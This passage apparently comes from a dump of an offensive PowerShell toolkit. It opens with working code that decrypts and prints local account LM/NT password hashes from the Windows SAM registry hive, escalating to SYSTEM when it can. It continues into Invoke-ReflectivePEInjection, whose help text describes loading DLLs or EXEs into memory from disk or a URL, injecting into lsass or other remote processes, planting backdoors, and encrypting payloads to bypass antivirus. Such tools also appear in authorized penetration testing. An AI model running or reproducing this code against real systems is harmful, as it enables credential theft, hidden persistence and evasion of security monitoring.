[PowerDump.Native]::RegQueryInfoKey($hkey,$classVal,[ref]$len,0,[ref]$null,[ref]$null, [ref]$null,[ref]$null,[ref]$null,[ref]$null,[ref]$null,0)) { $result = $classVal.ToString() } else { Write-Error "RegQueryInfoKey failed"; } [PowerDump.Native]::RegCloseKey($hkey) | Out-Null } else { Write-Error "Cannot open key"; } return $result; } function Get-BootKey { $s = [string]::Join("",$("JD","Skew1","GBG","Data" | %{Get-RegKeyClass "HKLM" "SYSTEM\CurrentControlSet\Control\Lsa\$_"})); $b = new-object byte[] $($s.Length/2); 0..$($b.Length-1) | %{$b[$_] = [Convert]::ToByte($s.Substring($($_*2),2),16)} $b2 = new-object byte[] 16; 0x8, 0x5, 0x4, 0x2, 0xb, 0x9, 0xd, 0x3, 0x0, 0x6, 0x1, 0xc, 0xe, 0xa, 0xf, 0x7 | % -begin{$i=0;}{$b2[$i]=$b[$_];$i++} return ,$b2; } function Get-HBootKey { param([byte[]]$bootkey); $aqwerty = [Text.Encoding]::ASCII.GetBytes("!@#$%^&*()qwertyUIOPAzxcvbnmQQQQQQQQQQQQ)(*@&%`0"); $anum = [Text.Encoding]::ASCII.GetBytes("0123456789012345678901234567890123456789`0"); $k = Get-Item HKLM:\SAM\SAM\Domains\Account; if (-not $k) {return $null} [byte[]]$F = $k.GetValue("F"); if (-not $F) {return $null} $rc4key = [Security.Cryptography.MD5]::Create().ComputeHash($F[0x70..0x7F] + $aqwerty + $bootkey + $anum); $rc4 = NewRC4 $rc4key; return ,($rc4.encrypt($F[0x80..0x9F])); } function Get-UserName([byte[]]$V) { if (-not $V) {return $null}; $offset = [BitConverter]::ToInt32($V[0x0c..0x0f],0) + 0xCC; $len = [BitConverter]::ToInt32($V[0x10..0x13],0); return [Text.Encoding]::Unicode.GetString($V, $offset, $len); } function Get-UserHashes($u, [byte[]]$hbootkey) { [byte[]]$enc_lm_hash = $null; [byte[]]$enc_nt_hash = $null; if ($u.HashOffset + 0x28 -lt $u.V.Length) { $lm_hash_offset = $u.HashOffset + 4; $nt_hash_offset = $u.HashOffset + 8 + 0x10; $enc_lm_hash = $u.V[$($lm_hash_offset)..$($lm_hash_offset+0x0f)]; $enc_nt_hash = $u.V[$($nt_hash_offset)..$($nt_hash_offset+0x0f)]; } elseif ($u.HashOffset + 0x14 -lt $u.V.Length) { $nt_hash_offset = $u.HashOffset + 8; $enc_nt_hash = [byte[]]$u.V[$($nt_hash_offset)..$($nt_hash_offset+0x0f)]; } return ,(DecryptHashes $u.Rid $enc_lm_hash $enc_nt_hash $hbootkey); } function DecryptHashes($rid, [byte[]]$enc_lm_hash, [byte[]]$enc_nt_hash, [byte[]]$hbootkey) { [byte[]]$lmhash = $empty_lm; [byte[]]$nthash=$empty_nt; # LM Hash if ($enc_lm_hash) { $lmhash = DecryptSingleHash $rid $hbootkey $enc_lm_hash $almpassword; } # NT Hash if ($enc_nt_hash) { $nthash = DecryptSingleHash $rid $hbootkey $enc_nt_hash $antpassword; } return ,($lmhash,$nthash) } function DecryptSingleHash($rid,[byte[]]$hbootkey,[byte[]]$enc_hash,[byte[]]$lmntstr) { $deskeys = sid_to_key $rid; $md5 = [Security.Cryptography.MD5]::Create(); $rc4_key = $md5.ComputeHash($hbootkey[0..0x0f] + [BitConverter]::GetBytes($rid) + $lmntstr); $rc4 = NewRC4 $rc4_key; $obfkey = $rc4.encrypt($enc_hash); $hash = (des_decrypt $obfkey[0..7] $deskeys[0]) + (des_decrypt $obfkey[8..$($obfkey.Length - 1)] $deskeys[1]); return ,$hash; } function Get-UserKeys { ls HKLM:\SAM\SAM\Domains\Account\Users | where {$_.PSChildName -match "^[0-9A-Fa-f]{8}$"} | Add-Member AliasProperty KeyName PSChildName -PassThru | Add-Member ScriptProperty Rid {[Convert]::ToInt32($this.PSChildName, 16)} -PassThru | Add-Member ScriptProperty V {[byte[]]($this.GetValue("V"))} -PassThru | Add-Member ScriptProperty UserName {Get-UserName($this.GetValue("V"))} -PassThru | Add-Member ScriptProperty HashOffset {[BitConverter]::ToUInt32($this.GetValue("V")[0x9c..0x9f],0) + 0xCC} -PassThru } function DumpHashes { LoadApi $bootkey = Get-BootKey; $hbootKey = Get-HBootKey $bootkey; Get-UserKeys | %{ $hashes = Get-UserHashes $_ $hBootKey; "{0}:{1}:{2}:{3}:::" -f ($_.UserName,$_.Rid, [BitConverter]::ToString($hashes[0]).Replace("-","").ToLower(), [BitConverter]::ToString($hashes[1]).Replace("-","").ToLower()); "`n" } } if ([priv]::IsUserAnAdmin()) { if ([System.Security.Principal.WindowsIdentity]::GetCurrent().IsSystem) { DumpHashes } else { ElevatePrivs if ([System.Security.Principal.WindowsIdentity]::GetCurrent().IsSystem) { DumpHashes } } } else { Write-Error "Administrator or System privileges necessary." } } ================================================ FILE: modules/Invoke-ReflectivePEInjection.ps1 ================================================ function Invoke-ReflectivePEInjection { <# .SYNOPSIS This script has two modes. It can reflectively load a DLL/EXE in to the PowerShell process, or it can reflectively load a DLL in to a remote process. These modes have different parameters and constraints, please lead the Notes section (GENERAL NOTES) for information on how to use them. 1.)Reflectively loads a DLL or EXE in to memory of the Powershell process. Because the DLL/EXE is loaded reflectively, it is not displayed when tools are used to list the DLLs of a running process. This tool can be run on remote servers by supplying a local Windows PE file (DLL/EXE) to load in to memory on the remote system, this will load and execute the DLL/EXE in to memory without writing any files to disk. 2.) Reflectively load a DLL in to memory of a remote process. As mentioned above, the DLL being reflectively loaded won't be displayed when tools are used to list DLLs of the running remote process. This is probably most useful for injecting backdoors in SYSTEM processes in Session0. Currently, you cannot retrieve output from the DLL. The script doesn't wait for the DLL to complete execution, and doesn't make any effort to cleanup memory in the remote process. While this script provides functionality to specify a file to load from disk a URL, or a byte array, these are more for demo purposes. The way I'd recommend using the script is to create a byte array containing the file you'd like to reflectively load, and hardcode that byte array in to the script. One advantage of doing this is you can encrypt the byte array and decrypt it in memory, which will bypass A/V. Another advantage is you won't be making web requests. The script can also load files from SQL Server and be used as a SQL Server backdoor. Please see the Casaba blog linked below (thanks to whitey). PowerSploit Function: Invoke-ReflectivePEInjection Author: Joe Bialek, Twitter: @JosephBialek License: BSD 3-Clause Required Dependencies: None Optional Dependencies: None Version: 1.4 .DESCRIPTION Reflectively loads a Windows PE file (DLL/EXE) in to the powershell process, or reflectively injects a DLL in to a remote process. .PARAMETER PEPath The path of the DLL/EXE to load and execute. This file must exist on the computer the script is being run on, not the remote computer. .PARAMETER PEUrl A URL containing a DLL/EXE to load and execute. .PARAMETER PEbase64 A base64 encoded string of DLL/EXE to load and execute. .PARAMETER ComputerName Optional, an array of computernames to run the script on. .PARAMETER FuncReturnType Optional, the return type of the function being called in the DLL. Default: Void Options: String, WString, Void. See notes for more information. IMPORTANT: For DLLs being loaded remotely, only Void is supported. .PARAMETER ExeArgs Optional, arguments to pass to the executable being reflectively loaded. .PARAMETER ProcName Optional, the name of the remote process to inject the DLL in to. If not injecting in to remote process, ignore this. .PARAMETER ProcId Optional, the process ID of the remote process to inject the DLL in to. If not injecting in to remote process, ignore this. .PARAMETER ForceASLR Optional, will force the use of ASLR on the PE being loaded even if the PE indicates it doesn't support ASLR. Some PE's will work with ASLR even if the compiler flags don't indicate they support it. Other PE's will simply crash. Make sure to test this prior to using. Has no effect when loading in to a remote process. .EXAMPLE Load DemoDLL from a URL and run the exported function WStringFunc on the current system, print the wchar_t* returned by WStringFunc(). Note that the file name on the website can be any file extension. Invoke-ReflectivePEInjection -PEUrl http://yoursite.com/DemoDLL.dll -FuncReturnType WString .EXAMPLE Load DemoDLL and run the exported function WStringFunc on Target.local, print the wchar_t* returned by WStringFunc(). Invoke-ReflectivePEInjection -PEPath DemoDLL.dll -FuncReturnType WString -ComputerName Target.local .EXAMPLE Load DemoDLL and run the exported function WStringFunc on all computers in the file targetlist.txt. Print the wchar_t* returned by WStringFunc() from all the computers. Invoke-ReflectivePEInjection -PEPath DemoDLL.dll -FuncReturnType WString -ComputerName (Get-Content targetlist.txt) .EXAMPLE Load DemoEXE and run it locally. Invoke-ReflectivePEInjection -PEPath DemoEXE.exe -ExeArgs "Arg1 Arg2 Arg3 Arg4" .EXAMPLE Load DemoEXE and run it locally. Forces ASLR on for the EXE. Invoke-ReflectivePEInjection -PEPath DemoEXE.exe -ExeArgs "Arg1 Arg2 Arg3 Arg4" -ForceASLR .EXAMPLE Refectively load DemoDLL_RemoteProcess.dll in to the lsass process on a remote computer. Invoke-ReflectivePEInjection -PEPath DemoDLL_RemoteProcess.dll -ProcName lsass -ComputerName Target.Local .EXAMPLE Load a PE from a byte array. Invoke-ReflectivePEInjection -PEPath (Get-Content c:\DemoEXE.exe -Encoding Byte) -ExeArgs "Arg1 Arg2 Arg3 Arg4" .NOTES GENERAL NOTES: The script has 3 basic sets of functionality: 1.) Reflectively load a DLL in to the PowerShell process -Can return DLL output to user when run remotely or locally. -Cleans up memory in the PS process once the DLL finishes executing. -Great for running pentest tools on remote computers without triggering process monitoring alerts. -By default, takes 3 function names, see below (DLL LOADING NOTES) for more info. 2.) Reflectively load an EXE in to the PowerShell process. -Can NOT return EXE output to user when run remotely. If remote output is needed, you must use a DLL. CAN return EXE output if run locally. -Cleans up memory in the PS process once the DLL finishes executing. -Great for running existing pentest tools which are EXE's without triggering process monitoring alerts. 3.) Reflectively inject a DLL in to a remote process. -Can NOT return DLL output to the user when run remotely OR locally. -Does NOT clean up memory in the remote process if/when DLL finishes execution. -Great for planting backdoor on a system by injecting backdoor DLL in to another processes memory. -Expects the DLL to have this function: void VoidFunc(). This is the function that will be called after the DLL is loaded. DLL LOADING NOTES: PowerShell does not capture an applications output if it is output using stdout, which is how Windows console apps output. If you need to get back the output from the PE file you are loading on remote computers, you must compile the PE file as a DLL, and have the DLL return a char* or wchar_t*, which PowerShell can take and read the output from. Anything output from stdout which is run using powershell remoting will not be returned to you. If you just run the PowerShell script locally, you WILL be able to see the stdout output from applications because it will just appear in the console window. The limitation only applies when using PowerShell remoting. For DLL Loading: Once this script loads the DLL, it calls a function in the DLL. There is a section near the bottom labeled "YOUR CODE GOES HERE" I recommend your DLL take no parameters. I have prewritten code to handle functions which take no parameters are return the following types: char*, wchar_t*, and void. If the function returns char* or wchar_t* the script will output the returned data. The FuncReturnType parameter can be used to specify which return type to use. The mapping is as follows: wchar_t* : FuncReturnType = WString char* : FuncReturnType = String void : Default, don't supply a FuncReturnType For the whcar_t* and char_t* options to work, you must allocate the string to the heap. Don't simply convert a string using string.c_str() because it will be allocaed on the stack and be destroyed when the DLL returns. The function name expected in the DLL for the prewritten FuncReturnType's is as follows: WString : WStringFunc String : StringFunc Void : VoidFunc These function names ARE case sensitive. To create an exported DLL function for the wstring type, the function would be declared as follows: extern "C" __declspec( dllexport ) wchar_t* WStringFunc() If you want to use a DLL which returns a different data type, or which takes parameters, you will need to modify this script to accomodate this. You can find the code to modify in the section labeled "YOUR CODE GOES HERE". Find a DemoDLL at: https://github.com/clymb3r/PowerShell/tree/master/Invoke-ReflectiveDllInjection .LINK Blog: http://clymb3r.wordpress.com/ Github repo: https://github.com/clymb3r/PowerShell/tree/master/Invoke-ReflectivePEInjection Blog on reflective loading: http://clymb3r.wordpress.com/2013/04/06/reflective-dll-injection-with-powershell/ Blog on modifying mimikatz for reflective loading: http://clymb3r.wordpress.com/2013/04/09/modifying-mimikatz-to-be-loaded-using-invoke-reflectivedllinjection-ps1/ Blog on using this script as a backdoor with SQL server: http://www.casaba.com/blog/ #> [CmdletBinding(DefaultParameterSetName="WebFile")] Param( [Parameter(ParameterSetName = "LocalFile", Position = 0, Mandatory = $true)] [String] $PEPath, [Parameter(ParameterSetName = "WebFile", Position = 0, Mandatory = $true)] [Uri] $PEUrl, [Parameter(ParameterSetName = "Bytes", Position = 0, Mandatory = $true)] [ValidateNotNullOrEmpty()] [String] $PEbase64, [Parameter(Position = 1)] [String[]] $ComputerName, [Parameter(Position = 2)] [ValidateSet( 'WString', 'String', 'Void' )] [String] $FuncReturnType = 'Void', [Parameter(Position = 3)] [String] $ExeArgs, [Parameter(Position = 4)] [Int32] $ProcId, [Parameter(Position = 5)] [String] $ProcName, [Parameter(Position = 6)] [Switch] $ForceASLR ) Set-StrictMode -Version 2 $RemoteScriptBlock = { [CmdletBinding()] Param( [Parameter(Position = 0, Mandatory = $true)] [Byte[]] $PEBytes, [Parameter(Position = 1, Mandatory = $true)] [String] $FuncReturnType, [Parameter(Position = 2, Mandatory = $true)] [Int32] $ProcId, [Parameter(Position = 3, Mandatory = $true)] [String] $ProcName, [Parameter(Position = 4, Mandatory = $true)] [Bool] $ForceASLR ) ################################### ########## Win32 Stuff ########## ################################### Function Get-Win32Types { $Win32Types = New-Object System.Object #Define all the structures/enums that will be used # This article shows you how to do this with reflection: http://www.exploit-monday.com/2012/07/structs-and-enums-using-reflection.html $Domain = [AppDomain]::CurrentDomain $DynamicAssembly = New-Object System.Reflection.AssemblyName('DynamicAssembly') $AssemblyBuilder = $Domain.DefineDynamicAssembly($DynamicAssembly, [System.Reflection.Emit.AssemblyBuilderAccess]::Run) $ModuleBuilder = $AssemblyBuilder.DefineDynamicModule('DynamicModule', $false) $ConstructorInfo = [System.Runtime.InteropServices.MarshalAsAttribute].GetConstructors()[0] ############ ENUM ############ #Enum MachineType $TypeBuilder = $ModuleBuilder.DefineEnum('MachineType', 'Public', [UInt16]) $TypeBuilder.DefineLiteral('Native', [UInt16] 0) | Out-Null $TypeBuilder.DefineLiteral('I386', [UInt16] 0x014c) | Out-Null $TypeBuilder.DefineLiteral('Itanium', [UInt16] 0x0200) | Out-Null $TypeBuilder.DefineLiteral('x64', [UInt16] 0x8664) | Out-Null $MachineType = $TypeBuilder.CreateType() $Win32Types | Add-Member -MemberType NoteProperty -Name MachineType -Value $MachineType #Enum MagicType $TypeBuilder = $ModuleBuilder.DefineEnum('MagicType', 'Public', [UInt16]) $TypeBuilder.DefineLiteral('IMAGE_NT_OPTIONAL_HDR32_MAGIC', [UInt16] 0x10b) | Out-Null $TypeBuilder.DefineLiteral('IMAGE_NT_OPTIONAL_HDR64_MAGIC', [UInt16] 0x20b) | Out-Null $MagicType = $TypeBuilder.CreateType() $Win32Types | Add-Member -MemberType NoteProperty -Name MagicType -Value $MagicType #Enum SubSystemType $TypeBuilder = $ModuleBuilder.DefineEnum('SubSystemType', 'Public', [UInt16]) $TypeBuilder.DefineLiteral('IMAGE_SUBSYSTEM_UNKNOWN', [UInt16] 0) | Out-Null $TypeBuilder.DefineLiteral('IMAGE_SUBSYSTEM_NATIVE', [UInt16] 1) | Out-Null $TypeBuilder.DefineLiteral('IMAGE_SUBSYSTEM_WINDOWS_GUI', [UInt16] 2) | Out-Null $TypeBuilder.DefineLiteral('IMAGE_SUBSYSTEM_WINDOWS_CUI', [UInt16] 3) | Out-Null $TypeBuilder.DefineLiteral('IMAGE_SUBSYSTEM_POSIX_CUI', [UInt16] 7) | Out-Null $TypeBuilder.DefineLiteral('IMAGE_SUBSYSTEM_WINDOWS_CE_GUI', [UInt16] 9) | Out-Null $TypeBuilder.DefineLiteral('IMAGE_SUBSYSTEM_EFI_APPLICATION', [UInt16] 10) | Out-Null $TypeBuilder.DefineLiteral('IMAGE_SUBSYSTEM_EFI_BOOT_SERVICE_DRIVER', [UInt16] 11) | Out-Null $TypeBuilder.DefineLiteral('IMAGE_SUBSYSTEM_EFI_RUNTIME_DRIVER', [UInt16] 12) | Out-Null $TypeBuilder.DefineLiteral('IMAGE_SUBSYSTEM_EFI_ROM', [UInt16] 13) | Out-Null $TypeBuilder.DefineLiteral('IMAGE_SUBSYSTEM_XBOX', [UInt16] 14) | Out-Null $SubSystemType = $TypeBuilder.CreateType() $Win32Types | Add-Member -MemberType NoteProperty -Name SubSystemType -Value $SubSystemType #Enum DllCharacteristicsType $TypeBuilder = $ModuleBuilder.DefineEnum('DllCharacteristicsType', 'Public', [UInt16]) $TypeBuilder.DefineLiteral('RES_0', [UInt16] 0x0001) | Out-Null $TypeBuilder.DefineLiteral('RES_1', [UInt16] 0x0002) | Out-Null $TypeBuilder.DefineLiteral('RES_2', [UInt16] 0x0004) | Out-Null $TypeBuilder.DefineLiteral('RES_3', [UInt16] 0x0008) | Out-Null $TypeBuilder.DefineLiteral('IMAGE_DLL_CHARACTERISTICS_DYNAMIC_BASE', [UInt16] 0x0040) | Out-Null $TypeBuilder.DefineLiteral('IMAGE_DLL_CHARACTERISTICS_FORCE_INTEGRITY', [UInt16] 0x0080) | Out-Null $TypeBuilder.DefineLiteral('IMAGE_DLL_CHARACTERISTICS_NX_COMPAT', [UInt16] 0x0100) | Out-Null $TypeBuilder.DefineLiteral('IMAGE_DLLCHARACTERISTICS_NO_ISOLATION', [UInt16] 0x0200) | Out-Null $TypeBuilder.DefineLiteral('IMAGE_DLLCHARACTERISTICS_NO_SEH', [UInt16] 0x0400) | Out-Null $TypeBuilder.DefineLiteral('IMAGE_DLLCHARACTERISTICS_NO_BIND', [UInt16] 0x0800) | Out-Null $TypeBuilder.DefineLiteral('RES_4', [UInt16] 0x1000) | Out-Null $TypeBuilder.DefineLiteral('IMAGE_DLLCHARACTERISTICS_WDM_DRIVER', [UInt16] 0x2000) | Out-Null $TypeBuilder.DefineLiteral('IMAGE_DLLCHARACTERISTICS_TERMINAL_SERVER_AWARE', [UInt16] 0x8000) | Out-Null $DllCharacteristicsType = $TypeBuilder.CreateType() $Win32Types | Add-Member -MemberType NoteProperty -Name DllCharacteristicsType -Value $DllCharacteristicsType ########### STRUCT ########### #Struct IMAGE_DATA_DIRECTORY $Attributes = 'AutoLayout, AnsiClass, Class, Public, ExplicitLayout, Sealed, BeforeFieldInit' $TypeBuilder = $ModuleBuilder.DefineType('IMAGE_DATA_DIRECTORY', $Attributes, [System.ValueType], 8) ($TypeBuilder.DefineField('VirtualAddress', [UInt32], 'Public')).SetOffset(0) | Out-Null ($TypeBuilder.DefineField('Size', [UInt32], 'Public')).SetOffset(4) | Out-Null $IMAGE_DATA_DIRECTORY = $TypeBuilder.CreateType() $Win32Types | Add-Member -MemberType NoteProperty -Name IMAGE_DATA_DIRECTORY -Value $IMAGE_DATA_DIRECTORY #Struct IMAGE_FILE_HEADER $Attributes = 'AutoLayout, AnsiClass, Class, Public, SequentialLayout, Sealed, BeforeFieldInit' $TypeBuilder = $ModuleBuilder.DefineType('IMAGE_FILE_HEADER', $Attributes, [System.ValueType], 20) $TypeBuilder.DefineField('Machine', [UInt16], 'Public') | Out-Null $TypeBuilder.DefineField('NumberOfSections', [UInt16], 'Public') | Out-Null $TypeBuilder.DefineField('TimeDateStamp', [UInt32], 'Public') | Out-Null $TypeBuilder.DefineField('PointerToSymbolTable', [UInt32], 'Public') | Out-Null $TypeBuilder.DefineField('NumberOfSymbols', [UInt32], 'Public') | Out-Null $TypeBuilder.DefineField('SizeOfOptionalHeader', [UInt16], 'Public') | Out-Null $TypeBuilder.DefineField('Characteristics', [UInt16], 'Public') | Out-Null $IMAGE_FILE_HEADER = $TypeBuilder.CreateType() $Win32Types | Add-Member -MemberType NoteProperty -Name IMAGE_FILE_HEADER -Value $IMAGE_FILE_HEADER #Struct IMAGE_OPTIONAL_HEADER64 $Attributes = 'AutoLayout, AnsiClass, Class, Public, ExplicitLayout, Sealed, BeforeFieldInit' $TypeBuilder = $ModuleBuilder.DefineType('IMAGE_OPTIONAL_HEADER64', $Attributes, [System.ValueType], 240) ($TypeBuilder.DefineField('Magic', $MagicType, 'Public')).SetOffset(0) | Out-Null ($TypeBuilder.DefineField('MajorLinkerVersion', [Byte], 'Public')).SetOffset(2) | Out-Null ($TypeBuilder.DefineField('MinorLinkerVersion', [Byte], 'Public')).SetOffset(3) | Out-Null ($TypeBuilder.DefineField('SizeOfCode', [UInt32], 'Public')).SetOffset(4) | Out-Null ($TypeBuilder.DefineField('SizeOfInitializedData', [UInt32], 'Public')).SetOffset(8) | Out-Null ($TypeBuilder.DefineField('SizeOfUninitializedData', [UInt32], 'Public')).SetOffset(12) | Out-Null ($TypeBuilder.DefineField('AddressOfEntryPoint', [UInt32], 'Public')).SetOffset(16) | Out-Null ($TypeBuilder.DefineField('BaseOfCode', [UInt32], 'Public')).SetOffset(20) | Out-Null ($TypeBuilder.DefineField('ImageBase', [UInt64], 'Public')).SetOffset(24) | Out-Null ($TypeBuilder.DefineField('SectionAlignment', [UInt32], 'Public')).SetOffset(32) | Out-Null ($TypeBuilder.DefineField('FileAlignment', [UInt32], 'Public')).SetOffset(36) | Out-Null ($TypeBuilder.DefineField('MajorOperatingSystemVersion', [UInt16], 'Public')).SetOffset(40) | Out-Null ($TypeBuilder.DefineField('MinorOperatingSystemVersion', [UInt16], 'Public')).SetOffset(42) | Out-Null ($TypeBuilder.DefineField('MajorImageVersion', [UInt16], 'Public')).SetOffset(44) | Out-Null ($TypeBuilder.DefineField('MinorImageVersion', [UInt16], 'Public')).SetOffset(46) | Out-Null ($TypeBuilder.DefineField('MajorSubsystemVersion', [UInt16], 'Public')).SetOffset(48) | Out-Null ($TypeBuilder.DefineField('MinorSubsystemVersion', [UInt16], 'Public')).SetOffset(50) | Out-Null ($TypeBuilder.DefineField('Win32VersionValue', [UInt32], 'Public')).SetOffset(52) | Out-Null ($TypeBuilder.DefineField('SizeOfImage', [UInt32], 'Public')).SetOffset(56) | Out-Null ($TypeBuilder.DefineField('SizeOfHeaders', [UInt32], 'Public')).SetOffset(60) | Out-Null ($TypeBuilder.DefineField('CheckSum', [UInt32], 'Public')).SetOffset(64) | Out-Null ($TypeBuilder.DefineField('Subsystem', $SubSystemType, 'Public')).SetOffset(68) | Out-Null ($TypeBuilder.DefineField('DllCharacteristics', $DllCharacteristicsType, 'Public')).SetOffset(70) | Out-Null ($TypeBuilder.DefineField('SizeOfStackReserve', [UInt64], 'Public')).SetOffset(72) | Out-Null ($TypeBuilder.DefineField('SizeOfStackCommit', [UInt64], 'Public')).SetOffset(80) | Out-Null ($TypeBuilder.DefineField('SizeOfHeapReserve', [UInt64], 'Public')).SetOffset(88) | Out-Null ($TypeBuilder.DefineField('SizeOfHeapCommit', [UInt64], 'Public')).SetOffset(96) | Out-Null ($TypeBuilder.DefineField('LoaderFlags', [UInt32], 'Public')).SetOffset(104) | Out-Null ($TypeBuilder.DefineField('NumberOfRvaAndSizes', [UInt32], 'Public')).SetOffset(108) | Out-Null ($TypeBuilder.DefineField('ExportTable', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(112) | Out-Null ($TypeBuilder.DefineField('ImportTable', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(120) | Out-Null ($TypeBuilder.DefineField('ResourceTable', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(128) | Out-Null ($TypeBuilder.DefineField('ExceptionTable', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(136) | Out-Null ($TypeBuilder.DefineField('CertificateTable', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(144) | Out-Null ($TypeBuilder.DefineField('BaseRelocationTable', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(152) | Out-Null ($TypeBuilder.DefineField('Debug', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(160) | Out-Null ($TypeBuilder.DefineField('Architecture', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(168) | Out-Null ($TypeBuilder.DefineField('GlobalPtr', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(176) | Out-Null ($TypeBuilder.DefineField('TLSTable', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(184) | Out-Null ($TypeBuilder.DefineField('LoadConfigTable', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(192) | Out-Null ($TypeBuilder.DefineField('BoundImport', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(200) | Out-Null ($TypeBuilder.DefineField('IAT', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(208) | Out-Null ($TypeBuilder.DefineField('DelayImportDescriptor', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(216) | Out-Null ($TypeBuilder.DefineField('CLRRuntimeHeader', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(224) | Out-Null ($TypeBuilder.DefineField('Reserved', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(232) | Out-Null $IMAGE_OPTIONAL_HEADER64 = $TypeBuilder.CreateType() $Win32Types | Add-Member -MemberType NoteProperty -Name IMAGE_OPTIONAL_HEADER64 -Value $IMAGE_OPTIONAL_HEADER64 #Struct IMAGE_OPTIONAL_HEADER32 $Attributes = 'AutoLayout, AnsiClass, Class, Public, ExplicitLayout, Sealed, BeforeFieldInit' $TypeBuilder = $ModuleBuilder.DefineType('IMAGE_OPTIONAL_HEADER32', $Attributes, [System.ValueType], 224) ($TypeBuilder.DefineField('Magic', $MagicType, 'Public')).SetOffset(0) | Out-Null ($TypeBuilder.DefineField('MajorLinkerVersion', [Byte], 'Public')).SetOffset(2) | Out-Null ($TypeBuilder.DefineField('MinorLinkerVersion', [Byte], 'Public')).SetOffset(3) | Out-Null ($TypeBuilder.DefineField('SizeOfCode', [UInt32], 'Public')).SetOffset(4) | Out-Null ($TypeBuilder.DefineField('SizeOfInitializedData', [UInt32], 'Public')).SetOffset(8) | Out-Null ($TypeBuilder.DefineField('SizeOfUninitializedData', [UInt32], 'Public')).SetOffset(12) | Out-Null ($TypeBuilder.DefineField('AddressOfEntryPoint', [UInt32], 'Public')).SetOffset(16) | Out-Null ($TypeBuilder.DefineField('BaseOfCode', [UInt32], 'Public')).SetOffset(20) | Out-Null ($TypeBuilder.DefineField('BaseOfData', [UInt32], 'Public')).SetOffset(24) | Out-Null ($TypeBuilder.DefineField('ImageBase', [UInt32], 'Public')).SetOffset(28) | Out-Null ($TypeBuilder.DefineField('SectionAlignment', [UInt32], 'Public')).SetOffset(32) | Out-Null ($TypeBuilder.DefineField('FileAlignment', [UInt32], 'Public')).SetOffset(36) | Out-Null ($TypeBuilder.DefineField('MajorOperatingSystemVersion', [UInt16], 'Public')).SetOffset(40) | Out-Null ($TypeBuilder.DefineField('MinorOperatingSystemVersion', [UInt16], 'Public')).SetOffset(42) | Out-Null ($TypeBuilder.DefineField('MajorImageVersion', [UInt16], 'Public')).SetOffset(44) | Out-Null ($TypeBuilder.DefineField('MinorImageVersion', [UInt16], 'Public')).SetOffset(46) | Out-Null ($TypeBuilder.DefineField('MajorSubsystemVersion', [UInt16], 'Public')).SetOffset(48) | Out-Null ($TypeBuilder.DefineField('MinorSubsystemVersion', [UInt16], 'Public')).SetOffset(50) | Out-Null ($TypeBuilder.DefineField('Win32VersionValue', [UInt32], 'Public')).SetOffset(52) | Out-Null ($TypeBuilder.DefineField('SizeOfImage', [UInt32], 'Public')).SetOffset(56) | Out-Null ($TypeBuilder.DefineField('SizeOfHeaders', [UInt32], 'Public')).SetOffset(60) | Out-Null ($TypeBuilder.DefineField('CheckSum', [UInt32], 'Public')).SetOffset(64) | Out-Null ($TypeBuilder.DefineField('Subsystem', $SubSystemType, 'Public')).SetOffset(68) | Out-Null ($TypeBuilder.DefineField('DllCharacteristics', $DllCharacteristicsType, 'Public')).SetOffset(70) | Out-Null ($TypeBuilder.DefineField('SizeOfStackReserve', [UInt32], 'Public')).SetOffset(72) | Out-Null ($TypeBuilder.DefineField('SizeOfStackCommit', [UInt32], 'Public')).SetOffset(76) | Out-Null ($TypeBuilder.DefineField('SizeOfHeapReserve', [UInt32], 'Public')).SetOffset(80) | Out-Null ($TypeBuilder.DefineField('SizeOfHeapCommit', [UInt32], 'Public')).SetOffset(84) | Out-Null ($TypeBuilder.DefineField('LoaderFlags', [UInt32], 'Public')).SetOffset(88) | Out-Null ($TypeBuilder.DefineField('NumberOfRvaAndSizes', [UInt32], 'Public')).SetOffset(92) | Out-Null ($TypeBuilder.DefineField('ExportTable', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(96) | Out-Null ($TypeBuilder.DefineField('ImportTable', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(104) | Out-Null ($TypeBuilder.DefineField('ResourceTable', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(112) | Out-Null ($TypeBuilder.DefineField('ExceptionTable', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(120) | Out-Null ($TypeBuilder.DefineField('CertificateTable', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(128) | Out-Null ($TypeBuilder.DefineField('BaseRelocationTable', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(136) | Out-Null ($TypeBuilder.DefineField('Debug', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(144) | Out-Null ($TypeBuilder.DefineField('Architecture', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(152) | Out-Null ($TypeBuilder.DefineField('GlobalPtr', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(160) | Out-Null ($TypeBuilder.DefineField('TLSTable', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(168) | Out-Null ($TypeBuilder.DefineField('LoadConfigTable', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(176) | Out-Null ($TypeBuilder.DefineField('BoundImport', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(184) | Out-Null ($TypeBuilder.DefineField('IAT', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(192) | Out-Null ($TypeBuilder.DefineField('DelayImportDescriptor', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(200) | Out-Null ($TypeBuilder.DefineField('CLRRuntimeHeader', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(208) | Out-Null ($TypeBuilder.DefineField('Reserved', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(216) | Out-Null $IMAGE_OPTIONAL_HEADER32 = 